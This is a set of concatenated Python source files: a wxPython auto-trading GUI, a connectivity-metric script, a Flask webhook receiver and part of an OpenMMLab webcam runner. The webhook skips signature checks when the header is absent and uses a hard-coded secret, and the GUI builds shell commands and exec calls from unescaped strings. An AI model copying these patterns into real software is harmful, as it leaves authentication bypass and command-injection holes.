elif getattr(self.__dict__[k], 'SetStringSelection', False):
self.__dict__[k].SetStringSelection(setvalue)
elif getattr(self.__dict__[k], 'SetPath', False):
self.__dict__[k].SetPath(setvalue)
#------------------------------------------
class Strategy(S, Mixin):
def __init__(self, *args, **kwds):
S.__init__(self, *args, **kwds)
wx.EVT_CHAR_HOOK(self, self.onKey)
self.configobj = {}
self.inifile = strategy_ini
self.configobj = {}
self.c_obj = ConfigObj(commodity_ini, encoding='utf-8')
self.field_keys = ['strategyfile', 'historyfile', 'ccode',
'period', 'num', 'cost',
'start', 'end', 'sid', 'run'
]
self.require_fields = ['strategyfile', 'ccode', 'period', 'num']
self.ccode.SetItems([v.get('ccode') for k, v in self.c_obj.items()])
self.period.SetItems(SUPPORT_TIME_NAME)
self.loaddata()
def validate(self, raw_dict={}):
for key in self.require_fields:
if not raw_dict.get(key, False):
return False
# extra validate
if not raw_dict.get('num').isdigit():
return False
if raw_dict.get('cost', False) and not raw_dict.get('cost').isdigit():
return False
return True
def get_data_dir(self):
if self.ccode.GetValue():
ccode = self.ccode.GetValue()
dir_name = "%s_%s" % (self.c_obj[ccode].get(
'mcode'), self.c_obj[ccode].get('ccode'))
history_dir = os.path.join(data_dir, dir_name)
if history_dir and not os.path.exists(history_dir):
os.makedirs(history_dir)
return history_dir
return ''
def onSubmit(self, event):
raw_dict = self.collect_data()
if not self.validate(raw_dict):
dlg = wx.MessageDialog(self,
_("You must at least have strategy file, commodity code, trading time period and max number of bars will use in strategy."),
_("Strategy"),
wx.OK | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(self,
_("Are you sure want to update?"),
_("Strategy"),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
sid = self.sid.GetValue()
if not sid:
# let's find a new sid, forget about race, lock, and looping
start_id = 1
if not sid:
sid = self.get_new_id()
raw_dict['sid'] = sid
# wx.DateTime
if raw_dict.get('start'):
raw_dict['start'] = wxd_to_python(
raw_dict.get('start')).strftime('%Y-%m-%d')
if raw_dict.get('end'):
raw_dict['end'] = wxd_to_python(
raw_dict.get('end')).strftime('%Y-%m-%d')
if sid not in self.configobj:
# insert
self.configobj[sid] = {}
for key in self.field_keys:
self.configobj[sid][key] = raw_dict.get(key, '')
self.configobj.write() # write ini file
self.Destroy()
def onValidate(self, event):
raw_dict = self.collect_data()
if 'strategyfile' in raw_dict:
final_command = r'%s --file "%s"' % (
TRADER_EXE, raw_dict['strategyfile'])
p = sub_process_stdout(final_command)
message = p.stdout.read().strip()
if message:
print "Go , haha ,cauch U", str(message), len(message), len(message.strip())
showMsg(self, message)
else:
showMsg(self, _("No error found"))
def onDelete(self, event):
if self.configobj and self.sid.GetValue():
sid = self.sid.GetValue()
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Delete'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
del self.configobj[sid] # delete & write back
self.configobj.write()
self.Destroy()
self.Destroy()
def onKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def onBackTest(self, event):
print "BackTest"
# you must specify the start date, end date or both
self.onSubmit(event)
self.loaddata()
sid = self.sid.GetValue()
raw_dict = self.configobj[sid]
# condition to run back test
_goBackTest = ((raw_dict.get('start') or raw_dict.get('end')) and
raw_dict.get('strategyfile') and raw_dict.get('historyfile'))
if _goBackTest:
# example command
# python trader.py -his FITX.txt --end 2010/10/13 -b 10 -f stest.py
command_list = [TRADER_EXE, '--file', r'"%s"' %
raw_dict['strategyfile']]
if raw_dict.get('start'):
command_list.append("--start")
command_list.append(raw_dict['start'])
if raw_dict.get('end'):
command_list.append("--end")
command_list.append(raw_dict['end'])
# must have
command_list.append("--history")
command_list.append(r'"%s"' % raw_dict['historyfile'])
final_command = " ".join(command_list)
p = sub_process_stdout(final_command)
message = p.stdout.read().strip()
#message = p.stdout.read()
if message:
# clean windows stdout line break
message = message.replace('\r', "")
fname = os.path.join(tempfile.gettempdir(), "autotrader.csv")
fp = open(fname, "w")
fp.write(message)
os.startfile(fname)
else:
dlg = wx.MessageDialog(self,
_("You must at least, config start date, end date or both, with history file"),
_("Back Test"),
wx.OK | wx.ICON_INFORMATION
)
dlg.ShowModal()
dlg.Destroy()
def get_new_id(self):
start_id = 1
sid = 0
while not sid:
if not str(start_id) in self.configobj:
sid = str(start_id)
return sid
start_id += 1
def loaddata(self):
self.configobj = ConfigObj(self.inifile, encoding='utf-8')
#------------------------------------------
class DDEWIN(D, Mixin):
def __init__(self, *args, **kwds):
D.__init__(self, *args, **kwds)
wx.EVT_CHAR_HOOK(self, self.onKey)
self.configobj = {}
self.field_keys = ['mcode', 'ccode',
'dde1_server', 'dde1_topic', 'dde1_time', 'dde1_price', 'dde1_volume',
'dde2_server', 'dde2_topic', 'dde2_time', 'dde2_price', 'dde2_volume'
] + SUPPORT_TIME
self.require_fields = ['dde1_server', 'dde1_topic',
'dde1_time', 'dde1_price', 'dde1_volume']
def validate(self, raw_dict={}):
for key in self.require_fields:
if not raw_dict.get(key, False):
return False
return True
def onSubmit(self, event):
raw_dict = self.collect_data()
if not self.validate(raw_dict):
dlg = wx.MessageDialog(self,
_("You must at least input DD1, time, price and volume, can refer from Excel."),
_("DDE"),
wx.OK | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(self,
_("Are you sure want to update?"),
_("DDE"),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
# TODO
self.GetParent().update_quote(raw_dict, self.field_keys)
self.Destroy()
def onCancel(self, event):
self.Close()
def onDelete(self, event):
if self.configobj:
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Delete'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
self.GetParent().delete_quote()
self.Destroy()
self.Destroy()
def onKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_ESCAPE:
self.Close()
event.Skip()
#------------------------------------------
class Commodity(C, Mixin):
def __init__(self, *args, **kwds):
C.__init__(self, *args, **kwds)
wx.EVT_CHAR_HOOK(self, self.onKey)
self.field_keys = ['cname', 'ccode', 'mcode', 'cpov',
'csource', 'cdir']
self.require_fields = ['cname', 'ccode', 'mcode']
self.inifile = commodity_ini
self.configobj = {}
self.m_obj = ConfigObj(market_ini, encoding='utf-8')
self.markets = [(v.get('mname'), v.get('mcode')) for k,
v in self.m_obj.items()]
self.loaddata()
self.csource.SetItems(QUOTE_SOURCE)
self.mcode.SetItems([mcode for mname, mcode in self.markets])
def validate(self, raw_dict={}):
for key in self.require_fields:
if not raw_dict.get(key, False):
return False
if not re_alphanumeric.search(raw_dict.get('ccode')):
return False
return True
def onSubmit(self, event):
raw_dict = self.collect_data()
if not self.validate(raw_dict):
dlg = wx.MessageDialog(self,
_("You must at least input Commodity Name, Commodity Code (alphanumeric), and Quote Folder for real time data processing, better at a ram disk folder."),
_("Market"),
wx.OK | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(self,
_("Are you sure want to update?") +
' ' + _("Remember to restart to ative changes."),
_("Market"),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
ccode = raw_dict['ccode'].upper()
raw_dict['ccode'] = ccode
if ccode not in self.configobj:
self.configobj[ccode] = {}
#print raw_dict
for key in self.field_keys:
self.configobj[ccode][key] = raw_dict.get(key, '')
self.configobj.write() # write ini file
self.Close()
def onSource(self, event):
if self.csource.GetStringSelection():
self.config.Enable()
else:
self.config.Enable(False)
def onConfig(self, event):
raw_dict = self.collect_data()
source = raw_dict.get('csource')
mcode = raw_dict.get('mcode')
ccode = raw_dict.get('ccode')
if source and source in QUOTE_SOURCE:
support_time = SUPPORT_TIME # FIXME, check this value
try:
exec('support_time = %s_SUPPORT_TIME' % source)
except:
pass # FIXME, better chance to load support field
try:
__import__("quote.%s" % (source), fromlist=[source])
dlg = DDEWIN(self) # FIXME, add more config
dlg.mcode.SetValue(mcode)
dlg.ccode.SetValue(ccode)
self.loaddata() # reload data again to make sure
if self.configobj.get(ccode):
dlg.configobj = self.configobj.get(ccode)
dlg.loaditem('quote')
dlg.ShowModal()
dlg.Destroy()
except ImportError:
self.GetParent().loginfo(_('No support quote module found.'))
def onHistory(self, event):
history_dir = self.check_history()
if history_dir:
if os.name == 'nt':
os.startfile(history_dir)
elif os.name == 'posix':
try:
os.system('xdg-open %s' % history_dir)
# try open histtory folder on linux
except:
pass # TODO
def check_history(self):
dir_name = ''
history_dir = ''
if self.ccode.GetValue() and self.mcode.GetStringSelection():
self.history.Enable()
dir_name = "%s_%s" % (self.mcode.GetStringSelection(
), self.ccode.GetValue().upper())
history_dir = os.path.join(data_dir, dir_name)
if history_dir and not os.path.exists(history_dir):
os.makedirs(history_dir)
return history_dir
else:
self.history.Enable(False)
return
def onMcode(self, event):
self.check_history()
def onDelete(self, event):
ccode = self.ccode.GetValue().upper()
if ccode and ccode in self.configobj:
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Delete'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
del self.configobj[ccode]
self.configobj.write()
self.Destroy()
def onKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def loaddata(self, m_obj={}):
self.configobj = ConfigObj(self.inifile, encoding='utf-8')
if m_obj:
self.m_obj = m_obj
def set_market_obj(self, m_obj={}):
if m_obj:
self.m_obj = m_obj
def update_quote(self, quote_obj={}, field_keys=[]):
if self.configobj and self.ccode.GetValue() and self.configobj.get(self.ccode.GetValue()):
cid = self.ccode.GetValue()
if not self.configobj[cid].get('quote', False):
self.configobj[cid]['quote'] = {}
for k in field_keys:
self.configobj[cid]['quote'][k] = quote_obj.get(k, '')
self.configobj.write()
def delete_quote(self):
if self.configobj and self.ccode.GetValue() and self.configobj.get(self.ccode.GetValue()):
del self.configobj[self.ccode.GetValue()]['quote']
self.configobj.write()
def loaditem(self, ccode=''):
super(Commodity, self).loaditem(ccode)
if self.csource.GetStringSelection():
self.config.Enable()
if self.ccode.GetValue() and self.mcode.GetStringSelection():
self.history.Enable()
#------------------------------------------
class Market(M, Mixin):
def __init__(self, *args, **kwds):
M.__init__(self, *args, **kwds)
wx.EVT_CHAR_HOOK(self, self.onKey)
self.field_keys = ['mname', 'mcode', 'mtimezone', 'mclear',
's1_start', 's1_end', 's2_start', 's2_end',
'd0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6'
]
self.require_fields = ['mname', 'mcode', 'mtimezone',
'mclear', 's1_start', 's1_end']
self.inifile = market_ini
self.configobj = {}
self.loaddata()
self.mtimezone.SetItems(timezones)
def validate(self, raw_dict={}):
for key in self.require_fields:
if not raw_dict.get(key, False):
return False
if not re_alphanumeric.search(raw_dict.get('mcode')):
return False
# special check for time 24HHMM
if raw_dict['mclear'] == u'00:00' or raw_dict['s1_end'] == u'00:00':
return False
return True
def onSubmit(self, event):
raw_dict = self.collect_data()
if not self.validate(raw_dict):
dlg = wx.MessageDialog(self,
_("You must at least input Market Name, Market Code (alphanumeric), Session Clear Time and Session 1 Time"),
_("Market"),
wx.OK | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(self,
_("Are you sure want to update?"),
_("Market"),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
mcode = raw_dict['mcode'].upper()
raw_dict['mcode'] = mcode
if raw_dict['mcode'] not in self.configobj:
self.configobj[mcode] = {}
for key in self.field_keys:
self.configobj[mcode][key] = raw_dict.get(key, '')
self.configobj.write() # write ini file
self.Close()
def onCancel(self, event):
self.Close()
def onDelete(self, event):
mcode = self.mcode.GetValue().upper()
if mcode and mcode in self.configobj:
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Delete'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
del self.configobj[mcode]
self.configobj.write()
self.Destroy()
def onKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def loaddata(self):
self.configobj = ConfigObj(self.inifile, encoding='utf-8')
#------------------------------------------
class FF(MyFrame):
def __init__(self, *args, **kwds):
MyFrame.__init__(self, *args, **kwds)
self.quote_process = {}
self.quote_workers = {}
self.trader = {}
self.strategy_process = {}
# main application timer
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.onTimer, self.timer)
self.timer.Start(1000 * 10)
self.m_obj = {} # market
self.c_obj = {} # commodity
self.s_obj = {} # strategy
self.market_ini = market_ini
self.commodity_ini = commodity_ini
self.strategy_ini = strategy_ini
self.data_ids = ['username', 'password', 'cert',
'certpass', 'autostart', ] # 'sctrl','actrl']
self.logfilename = os.path.join(app_dir, "autotrader.log")
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
filename=self.logfilename,
)
self.logger = logging.getLogger('')
# Market
self.mctrl.InsertColumn(0, _("Market Name"))
self.mctrl.InsertColumn(1, _("Market Code"))
self.mctrl.InsertColumn(2, _("Market Time Zone"))
# Commodity
self.cctrl.InsertColumn(0, _("Commodity Name"))
self.cctrl.InsertColumn(1, _("Commodity Code"))
self.cctrl.InsertColumn(2, _("Market Code"))
self.cctrl.InsertColumn(3, _("Quote Source"))
self.cctrl.InsertColumn(4, _("Quote Folder"))
# Strategy
self.sctrl.InsertColumn(0, _("Id"))
self.sctrl.InsertColumn(1, _("Commodity Code"))
self.sctrl.InsertColumn(2, _("Program File"))
self.sctrl.InsertColumn(3, _("Time Period"))
self.loaddata()
self.render_all()
# test
self.test = None
def onMarket(self, event):
dlg = Market(self)
dlg.ShowModal()
dlg.Destroy()
self.load_market()
self.render_market()
def onMarketActive(self, event):
item_index = event.m_itemIndex
mcode = self.mctrl.GetItem(item_index, 1).GetText()
dlg = Market(self)
dlg.loaditem(mcode)
dlg.ShowModal()
dlg.Destroy()
self.load_market()
self.render_market()
def onCommodity(self, event):
dlg = Commodity(self)
dlg.ShowModal()
dlg.Destroy()
self.loaddata()
self.render_commodity()
def onCommodityActive(self, event):
item_index = event.m_itemIndex
ccode = self.cctrl.GetItem(item_index, 1).GetText()
dlg = Commodity(self)
dlg.loaditem(ccode)
dlg.ShowModal()
dlg.Destroy()
self.load_commodity()
self.render_commodity()
def onStrategy(self, event):
dlg = Strategy(self)
dlg.ShowModal()
dlg.Destroy()
self.load_strategy()
self.render_strategy()
def onStrategyActive(self, event):
item_index = event.m_itemIndex
sid = self.sctrl.GetItem(item_index, 0).GetText()
dlg = Strategy(self)
dlg.loaditem(sid)
dlg.ShowModal()
dlg.Destroy()
self.load_strategy()
self.render_strategy()
def OnCheckItem(self, index, flag):
sid = self.sctrl.GetItem(index, 0).GetText()
#print index, flag, sid
if self.s_obj.get(sid, False):
# toggle run key value
if flag:
self.s_obj[sid]['run'] = True
else:
self.s_obj[sid]['run'] = ""
self.s_obj.write()
def onSave(self, event):
dd = {}
for k in self.data_ids:
item = getattr(self, k)
if hasattr(item, 'GetValue'):
if k == 'username':
dd[k] = item.GetValue().upper()
else:
dd[k] = item.GetValue()
elif hasattr(item, 'GetPath'):
dd[k] = item.GetPath()
self.data = dd
def onAbout(self, event):
info = wx.AboutDialogInfo()
info.Name = __appname__
info.Version = __version__
info.Copyright = __author__
info.Description = wordwrap(
_("An easy tool for you to trade any commodity you like.\nLicense: MIT for individual, GPL for none individual.\n Author: TerryH"),
350, wx.ClientDC(self))
info.WebSite = (u"http://terryh.tp.blogspot.com/", u"TerryH's Blog")
wx.AboutBox(info)
def onQuit(self, event):
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Close'),
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
# close all process
self.stop_process()
self.Destroy()
def onTimer(self, event):
"""
create process for quote service, strategy start or stop
"""
#self.loginfo('onTimer')
for k, v in self.c_obj.items():
if v.get('csource'):
ccode = v['ccode'] # commodity code
mcode = v['mcode'] # market code
source = v['csource']
mtimezone = self.m_obj[mcode]['mtimezone']
session_start = ''
session_end = ''
mclear = self.m_obj[mcode]['mclear']
s1_start = self.m_obj[mcode]['s1_start']
s1_end = self.m_obj[mcode]['s1_end']
s2_end = self.m_obj[mcode]['s2_end']
if mclear and mclear != '00:00':
session_start = mclear
elif s1_start and s1_start != '00:00':
session_start = mclear
if s2_end and s2_end != '00:00':
session_end = s2_end
elif s1_end and s1_end != '00:00':
session_end = s1_end
key = "%s_%s" % (mcode, ccode)
# commodity configureobj, get quote dir
com_data_dir = os.path.join(app_dir, 'data', mcode, ccode)
if v.get('cdir', False):
com_quote_dir = os.path.join(
v.get('cdir'), 'data', mcode, ccode)
else:
# parent folder data/mcode/ccode
com_quote_dir = com_data_dir
#self.loginfo(str(self.quote_process))
if self.should_running(session_start, session_end, mtimezone):
# check this quote should running
if key not in self.quote_process:
# not running quote process
#s_hour, s_minute = map(int, session_start.split(':',1))
#now = get_now(mtimezone)
#market_start_time = get_tz_hhmm(s_hour, s_minute, mtimezone)
# we must start app 1 minute before market open
#if (market_start_time-now).seconds < 60:
#quote_module = __import__("quote.%s" % source , fromlist=[source])
quote_exe = source + ".exe"
#--------------------------------------------------
# TODO nolonger use, REMOVE
# start_quote_process and start_quote_workers
#t = start_quote_process( source, ccode, self.commodity_ini )
#self.quote_process[key] = t
#w = start_quote_workers(self.market_ini, self.commodity_ini, ccode)
#self.quote_workers[key] = w
#--------------------------------------------------
#--------------------------------------------------
# FIXME, need to uncomment
# sub_quote_process and sub_quote_workers, add quote
# for file path in case path have space
final_command = '%s --config "%s" --commodity %s' % (
quote_exe, self.commodity_ini, ccode)
self.loginfo(final_command)
t = sub_process(final_command)
self.quote_process[key] = t
final_command = '%s --mini "%s" --cini "%s" --commodity %s' % (QUOTE_WRITER_EXE, self.market_ini, self.commodity_ini, ccode)
self.loginfo(final_command)
w = sub_process(final_command)
self.quote_workers[key] = w
#--------------------------------------------------
#--------------------------------------------------
# check srategy should running
for sk, sv in self.s_obj.items():
# we store Troe False as string, TODO s_obj not update
# after saved, but should be lock update after running
# trader. ???
if sv['ccode'] == ccode:
if sv['run'] == True:
# prepare command
period_code = SUPPORT_TIME[
SUPPORT_TIME_NAME.index(sv['period'])]
hisfile = os.path.join(
com_data_dir, "%s.csv" % (period_code))
quotefile = os.path.join(
com_quote_dir, "%s.ohlc" % (period_code))
#trader.py -his data\SMX\STW\min5.csv -q R:\TEMP\data\SMX\STW\min5.ohlc -f stest.py -g
final_command = r'%s --history "%s" --quote "%s" --file "%s" -g' % (TRADER_EXE, hisfile, quotefile, sv['strategyfile'])
# check exist or dead
if sk not in self.trader:
self.loginfo(final_command)
t = sub_process(final_command)
self.trader[sk] = t
else:
# have tarder running, let's poll it health
if self.trader[sk].poll() is not None:
# poll() == None mean running, maybe
# some thing wrong restart it.
self.trader.pop(sk)
self.loginfo(final_command)
t = sub_process(final_command)
self.trader[sk] = t
#--------------------------------------------------
def should_running(self, start, end, timezone):
if (start and end and timezone):
now = get_now(timezone)
hh, mm = map(int, start.split(':', 1))
tzstart = get_tz_hhmm(hh, mm, timezone)
hh, mm = map(int, end.split(':', 1))
tzend = get_tz_hhmm(hh, mm, timezone)
if end < start:
# trading time cross midnight
return now >= tzstart or now <= tzend
else:
return now >= tzstart and now <= tzend
return now >= tzstart
return False
def stop_process(self):
# wait for close multiprocessing.Process
#--------------------------------------------------
for k in self.trader.keys():
try:
self.trader[k].terminate()
except WindowsError:
# if the quote source server already died
# WindowsError: [Error 5] Access Denied
# FIXME
pass
for k in self.quote_process.keys():
try:
self.quote_process[k].terminate()
except WindowsError:
# if the quote source server already died
# WindowsError: [Error 5] Access Denied
# FIXME
pass
for k in self.quote_workers.keys():
try:
self.quote_workers[k].terminate()
except WindowsError:
# if the quote source server already died
# WindowsError: [Error 5] Access Denied
# FIXME
pass
#isalive = 1
#while isalive:
#isalive = 0
#for k in self.quote_process.keys():
#isalive = isalive + self.quote_process[k].is_alive()
#isalive = 1
#while isalive:
#isalive = 0
#for k in self.quote_workers.keys():
#isalive = isalive + self.quote_workers[k].is_alive()
#--------------------------------------------------
#if hasattr(sys, 'frozen'):
## We need to wait for all child processes otherwise
## --onefile mode won't work.
#while multiprocessing.active_children():
#multiprocessing.active_children()[0].terminate()
#time.sleep(3) # wait for kill all, FIXME better way for waitting
def render_all(self):
self.render_market()
self.render_commodity()
self.render_strategy()
def render_market(self):
self.mctrl.DeleteAllItems()
for k, v in self.m_obj.items():
index = self.mctrl.InsertStringItem(sys.maxint, v.get('mname'))
self.mctrl.SetStringItem(index, 1, v.get('mcode'))
self.mctrl.SetStringItem(index, 2, v.get('mtimezone'))
self.mctrl.SetColumnWidth(2, 100)
self.mctrl.SetItemBackgroundColour(index, wx.Color(229, 229, 229))
def render_commodity(self):
self.cctrl.DeleteAllItems()
for k, v in self.c_obj.items():
index = self.cctrl.InsertStringItem(sys.maxint, v.get('cname'))
self.cctrl.SetStringItem(index, 1, v.get('ccode'))
self.cctrl.SetStringItem(index, 2, v.get('mcode'))
self.cctrl.SetStringItem(index, 3, v.get('csource'))
self.cctrl.SetStringItem(index, 4, v.get('cdir'))
self.cctrl.SetItemBackgroundColour(index, wx.Color(229, 229, 229))
def render_strategy(self):
self.sctrl.DeleteAllItems()
for k, v in self.s_obj.items():
index = self.sctrl.InsertStringItem(sys.maxint, k)
self.sctrl.SetStringItem(index, 1, v.get('ccode'))
self.sctrl.SetStringItem(index, 2, v.get('strategyfile'))
self.sctrl.SetStringItem(index, 3, v.get('period'))
self.sctrl.SetItemBackgroundColour(index, wx.Color(229, 229, 229))
if v.get('run') == u"True":
self.sctrl.CheckItem(index)
def load_market(self):
self.m_obj = ConfigObj(self.market_ini, encoding='utf-8')
def load_commodity(self):
self.c_obj = ConfigObj(self.commodity_ini, encoding='utf-8')
def load_strategy(self):
self.s_obj = ConfigObj(self.strategy_ini, encoding='utf-8')
def loaddata(self):
self.load_market()
self.load_commodity()
self.load_strategy()
def loginfo(self, text=u""):
if text:
self.log.AppendText(datetime.datetime.now(
).strftime("%m-%d %H:%M:%S") + u" " + text + u"\n")
self.logger.info(text)
if __name__ == '__main__':
if sys.platform.startswith('win'):
multiprocessing.freeze_support() # multiprcessing workaround
app = wx.PySimpleApp(False)
#---------------------------------------------
# locale
#basepath = os.path.abspath(os.path.dirname(sys.argv[0]))
#localedir = os.path.join(basepath, "locale")
langid = wx.LANGUAGE_DEFAULT
mylocale = wx.Locale(langid)
mylocale.AddCatalogLookupPathPrefix('./locale')
mylocale.AddCatalog('messages')
_ = wx.GetTranslation
# override
import __builtin__
__builtin__._ = wx.GetTranslation
# override wxobject
import wxobject
wxobject._ = wx.GetTranslation
#---------------------------------------------
frm = FF(None)
frm.Show()
# DEBUG comment out following two line
#import wx.lib.inspection
#wx.lib.inspection.InspectionTool().Show()
app.MainLoop()
|
cal_connectivity.py
|
from dk_metric import image_metrics
import os
from multiprocessing import Process, Lock, Manager
import numpy as np
import time
import sys
gt_folder = sys.argv[1]
prop_folder = sys.argv[2]
lock = Lock()
Thread_Cnt = 16
Threshold = 0.4 * 255
def cal_connectivity(files, l, threshold):
# sTP, sFP, sFN, msTP, msFP, msFN
start_time = time.time()
score, n = 0, 0
for i, f in enumerate(files):
gt_path = os.path.join(gt_folder, f)
prop_path = os.path.join(prop_folder, f)
if i != 0 and i % 100 == 0:
print(os.getpid(), i, 'th file... use', time.time() - start_time, 'seconds.')
s = image_metrics.get_connectivity(gt_path, prop_path, threshold=threshold, N=100, Suppress=True)
if s is not None:
score += s;
n += 1
with lock:
l[0] += score
l[1] += n
if __name__ == '__main__':
files = os.listdir(prop_folder)
manager = Manager()
# Score, Image_cnt
ml = manager.list([0, 0])
pool = []
files_threads = np.array_split(files, Thread_Cnt)
for i in range(Thread_Cnt):
pool.append(Process(target=cal_connectivity, args=(files_threads[i].tolist(), ml, Threshold,)))
for t in pool:
t.start()
for t in pool:
t.join()
total_score, n = list(ml)
print(total_score / n)
|
app.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @author : microfat
# @time : 04/21/22 11:37:59
# @File : app.py
import hashlib
import threading
import json
from pygments import highlight, lexers, formatters
from flask import Flask, request
app = Flask(__name__)
class Handle:
def __init__(self):
pass
def handle(self, payload):
if payload['op'] == 'data_create':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_update':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_remove':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_recover':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'form_update':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_test':
print('data_test')
def _colorful_json(self, payload):
formatted_json = json.dumps(payload, indent=4, ensure_ascii=False, sort_keys=True)
colorful_json = highlight(formatted_json, lexers.JsonLexer(), formatters.TerminalFormatter())
return colorful_json
def get_signature(self, nonce, payload, secret, timestamp):
content = ':'.join([nonce, payload, secret, timestamp]).encode('utf-8')
m = hashlib.sha1()
m.update(content)
#print(content, m.hexdigest())
return m.hexdigest()
@app.route('/', methods=['POST'])
def callback():
handle = Handle()
payload = request.data.decode('utf-8')
#print(payload)
nonce = request.args['nonce']
timestamp = request.args['timestamp']
print('\n' + '\x1b[94m' + str(request.headers) + '\x1b[39;49;00m', end='')
if 'x-jdy-signature' not in request.headers:
threading.Thread(target=handle.handle, args=(json.loads(payload), )).start()
return 'success'
elif request.headers['x-jdy-signature'] != handle.get_signature(nonce, payload, 'test', timestamp):
return 'fail', 401
else:
threading.Thread(target=handle.handle, args=(json.loads(payload), )).start()
return 'success'
|
webcam_runner.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import logging
import sys
import time
import warnings
from contextlib import nullcontext
from threading import Thread
from typing import Dict, List, Optional, Tuple, Union
import cv2
from .nodes import NODES
from .utils import (BufferManager, EventManager, FrameMessage, ImageCapture,
VideoEndingMessage, is_image_file, limit_max_fps)
DEFAULT_FRAME_BUFFER_SIZE = 1
DEFAULT_INPUT_BUFFER_SIZE = 1
DEFAULT_DISPLAY_BUFFER_SIZE = 0
DEFAULT_USER_BUFFER_SIZE = 1
class WebcamRunner():
"""An interface for building webcam application from config.
Parameters:
name (str): Runner name.
camera_id (int | str): The camera ID (usually the ID of the default
camera is 0). Alternatively a file path or a URL can be given
to load from a video or image file.
camera_frame_shape (tuple, optional): Set the frame shape of the
camera in (width, height). If not given, the default frame shape
will be used. This argument is only valid when using a camera
as the input source. Default: None
camera_fps (int): Video reading maximum FPS. Default: 30
buffer_sizes (dict, optional): A dict to specify buffer sizes. The
key is the buffer name and the value is the buffer size.
Default: None
nodes (list): Node configs.
"""
def __init__(self,
name: str = 'Default Webcam Runner',
camera_id: Union[int, str] = 0,
camera_fps: int = 30,
camera_frame_shape: Optional[Tuple[int, int]] = None,
synchronous: bool = False,
buffer_sizes: Optional[Dict[str, int]] = None,
nodes: Optional[List[Dict]] = None):
# Basic parameters
self.name = name
self.camera_id = camera_id
self.camera_fps = camera_fps
self.camera_frame_shape = camera_frame_shape
self.synchronous = synchronous
# self.buffer_manager manages data flow between runner and nodes
self.buffer_manager = BufferManager()
# self.event_manager manages event-based asynchronous communication
self.event_manager = EventManager()
# self.node_list holds all node instance
self.node_list = []
# self.vcap is used to read camera frames. It will be built when the
# runner starts running
self.vcap = None
# Register runner events
self.event_manager.register_event('_exit_', is_keyboard=False)
if self.synchronous:
self.event_manager.register_event('_idle_', is_keyboard=False)
# Register nodes
if not nodes:
raise ValueError('No node is registered to the runner.')
# Register default buffers
if buffer_sizes is None:
buffer_sizes = {}
# _frame_ buffer
frame_buffer_size = buffer_sizes.get('_frame_',
DEFAULT_FRAME_BUFFER_SIZE)
self.buffer_manager.register_buffer('_frame_', frame_buffer_size)
# _input_ buffer
input_buffer_size = buffer_sizes.get('_input_',
DEFAULT_INPUT_BUFFER_SIZE)
self.buffer_manager.register_buffer('_input_', input_buffer_size)
# _display_ buffer
display_buffer_size = buffer_sizes.get('_display_',
DEFAULT_DISPLAY_BUFFER_SIZE)
self.buffer_manager.register_buffer('_display_', display_buffer_size)
# Build all nodes:
for node_cfg in nodes:
logging.info(f'Create node: {node_cfg.name}({node_cfg.type})')
node = NODES.build(node_cfg)
# Register node
self.node_list.append(node)
# Register buffers
for buffer_info in node.registered_buffers:
buffer_name = buffer_info.buffer_name
if buffer_name in self.buffer_manager:
continue
buffer_size = buffer_sizes.get(buffer_name,
DEFAULT_USER_BUFFER_SIZE)
self.buffer_manager.register_buffer(buffer_name, buffer_size)
logging.info(
f'Register user buffer: {buffer_name}({buffer_size})')
# Register events
for event_info in node.registered_events:
self.event_manager.register_event(
event_name=event_info.event_name,
is_keyboard=event_info.is_keyboard)
logging.info(f'Register event: {event_info.event_name}')
# Set runner for nodes
# This step is performed after node building when the runner has
